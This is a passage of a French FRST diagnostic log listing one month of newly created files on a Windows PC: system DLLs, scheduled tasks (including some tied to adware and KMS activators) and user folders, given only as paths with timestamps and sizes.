(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2019-05-10 09:12 - 2019-05-10 09:14 - 000037716 _____ C:\Users\lenor\Downloads\FRST.txt
2019-05-10 09:12 - 2019-05-10 09:12 - 002430976 _____ (Farbar) C:\Users\lenor\Downloads\FRST64.exe
2019-05-10 09:12 - 2019-05-10 09:12 - 000000000 ____D C:\FRST
2019-05-09 21:57 - 2019-05-09 21:57 - 001214008 _____ (Google LLC) C:\Users\lenor\Downloads\ChromeSetup(2).exe
2019-05-09 21:39 - 2019-05-09 21:39 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2019-05-09 21:38 - 2019-05-09 21:20 - 000000000 ____D C:\Windows.old
2019-05-09 21:36 - 2019-05-09 21:36 - 000000290 __RSH C:\Users\lenor\ntuser.pol
2019-05-09 21:36 - 2019-05-09 21:36 - 000000020 ___SH C:\Users\lenor\ntuser.ini
2019-05-09 21:19 - 2019-05-09 21:20 - 000003318 _____ C:\WINDOWS\System32\Tasks\Yahoo! Powered rocim
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1006
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1004
2019-05-09 21:19 - 2019-05-09 21:20 - 000002854 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-1001
2019-05-09 21:19 - 2019-05-09 21:20 - 000002850 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1452226929-484460335-584983045-500
2019-05-09 21:19 - 2019-05-09 21:20 - 000002844 _____ C:\WINDOWS\System32\Tasks\***@***
2019-05-09 21:19 - 2019-05-09 21:20 - 000002234 _____ C:\WINDOWS\System32\Tasks\{1E3119E5-1603-4913-A777-A1C5DF1CA0CE}
2019-05-09 21:19 - 2019-05-09 21:20 - 000002216 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2019-05-09 21:19 - 2019-05-09 21:19 - 000003920 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player NPAPI Notifier
2019-05-09 21:19 - 2019-05-09 21:19 - 000003618 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2019-05-09 21:19 - 2019-05-09 21:19 - 000003482 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2019-05-09 21:19 - 2019-05-09 21:19 - 000002988 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-05-09 21:19 - 2019-05-09 21:19 - 000002874 _____ C:\WINDOWS\System32\Tasks\YoutubeDownloader
2019-05-09 21:19 - 2019-05-09 21:19 - 000002702 _____ C:\WINDOWS\System32\Tasks\GarminUpdaterTask
2019-05-09 21:19 - 2019-05-09 21:19 - 000002548 _____ C:\WINDOWS\System32\Tasks\AutoPico Daily Restart
2019-05-09 21:19 - 2019-05-09 21:19 - 000002486 _____ C:\WINDOWS\System32\Tasks\wKernelCrash
2019-05-09 21:19 - 2019-05-09 21:19 - 000002456 _____ C:\WINDOWS\System32\Tasks\Chameleon Folder-lenor
2019-05-09 21:19 - 2019-05-09 21:19 - 000002220 _____ C:\WINDOWS\System32\Tasks\{6C77685D-7F00-4C1E-AEE5-91A62F78D5AD}
2019-05-09 21:19 - 2019-05-09 21:19 - 000002218 _____ C:\WINDOWS\System32\Tasks\{3F7FF5BB-9B22-444D-872C-B464C65A7AFA}
2019-05-09 21:19 - 2019-05-09 21:19 - 000002146 _____ C:\WINDOWS\System32\Tasks\StartCN
2019-05-09 21:19 - 2019-05-09 21:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\S-1-5-21-1452226929-484460335-584983045-1001
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\R@1n-KMS
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\Avast Software
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\Apple
2019-05-09 21:19 - 2019-05-09 21:19 - 000000000 ____D C:\WINDOWS\System32\Tasks\{3A287BE1-DB6C-4695-C936-524D55D6CD02}
2019-05-09 21:15 - 2019-05-09 21:18 - 000015243 _____ C:\WINDOWS\diagwrn.xml
2019-05-09 21:15 - 2019-05-09 21:18 - 000015243 _____ C:\WINDOWS\diagerr.xml
2019-05-09 21:03 - 2019-05-09 21:57 - 001771406 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-09 20:53 - 2019-05-09 20:53 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2019-05-09 20:48 - 2019-05-09 21:36 - 000000000 ____D C:\Users\lenor
2019-05-09 20:48 - 2019-05-09 21:03 - 000000000 ____D C:\Users\teste1
2019-05-09 20:48 - 2019-05-09 21:02 - 000000000 ____D C:\Users\Administrateur
2019-05-09 20:48 - 2019-05-09 20:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2019-05-09 20:48 - 2019-05-09 20:48 - 000000000 ____D C:\Program Files (x86)\AMD
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\teste1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:48 - 2018-09-15 09:29 - 000001105 _____ C:\Users\Administrateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-05-09 20:44 - 2019-05-09 20:44 - 000000000 ____D C:\ProgramData\USOShared
2019-05-09 20:44 - 2019-03-12 08:31 - 002865152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2019-05-09 20:40 - 2019-05-09 21:35 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-05-09 20:40 - 2019-05-09 20:58 - 000466904 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-05-09 20:36 - 2019-05-09 20:36 - 000000724 _____ C:\Users\lenor\AppData\Local\LMIR107EB001.tmp.bat
2019-05-09 20:36 - 2019-05-09 20:36 - 000000528 _____ C:\Users\lenor\AppData\Local\LMIR107EB001.tmp_r.bat
2019-05-09 20:20 - 2019-05-09 21:38 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2019-05-09 20:19 - 2019-05-09 20:20 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2019-05-09 20:14 - 2019-05-09 20:14 - 026810880 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 023441920 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 020815360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 019025408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 012844032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 012140032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 008898048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 007919104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 007877120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 006071296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 005436904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 004660224 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 004488192 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003904512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003690496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003656192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003602944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tellib.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003551112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 003442176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003421696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 003406848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002942464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002393088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002205184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 002127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001521664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001459080 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001309696 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001297120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001294520 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001259320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2019-05-09 20:14 - 2019-05-09 20:14 - 001072424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001047552 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 001019392 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000897536 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000815616 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000772608 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshwfp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000740352 _____ (Microsoft Corporation) C:\WINDOWS\system32\cscsvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000695296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2019-05-09 20:14 - 2019-05-09 20:14 - 000684032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000666624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000663552 _____ (Microsoft Corporation) C:\WINDOWS\system32\objsel.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedRealitySvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessManager.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2019-05-09 20:14 - 2019-05-09 20:14 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000464384 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpshell.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000454144 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000370688 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxdiag.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpinit.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000317240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mssecflt.sys
2019-05-09 20:14 - 2019-05-09 20:14 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxdiag.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000263576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\spacebridge.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000109568 _____ C:\WINDOWS\system32\uwfcfgmgmt.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssecuser.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshhttp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfts.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshhttp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfts.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 015223296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 009683472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 007883776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 007645632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006925824 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006544256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006440960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006309040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005765120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005296640 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005210904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004866560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AI.MachineLearning.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004704272 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupapi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004588544 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 004527624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupapi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004304896 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003982848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003657728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 003496448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AI.MachineLearning.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003426816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003384832 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003377976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 003334144 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002925880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002871304 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 002842624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002777224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002765312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002701512 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002689024 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002627384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002469376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002438368 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002346496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002275888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002189312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002073960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002042368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001994976 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001969464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 001918464 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001860096 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001844448 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001830200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001768960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001760768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001711104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001701888 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001697960 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-09 20:13 - 2019-05-09 20:13 - 001687552 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001674696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001671680 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001671352 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001653760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001647632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001641400 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001615872 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuin.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001605120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001590064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001506304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001484800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001478968 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001469168 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001467552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001458056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001395056 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001382912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001370624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001360184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 001342400 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-09 20:13 - 2019-05-09 20:13 - 001315328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001311232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001256448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001249280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001221944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001179680 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001155072 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuuc.dll
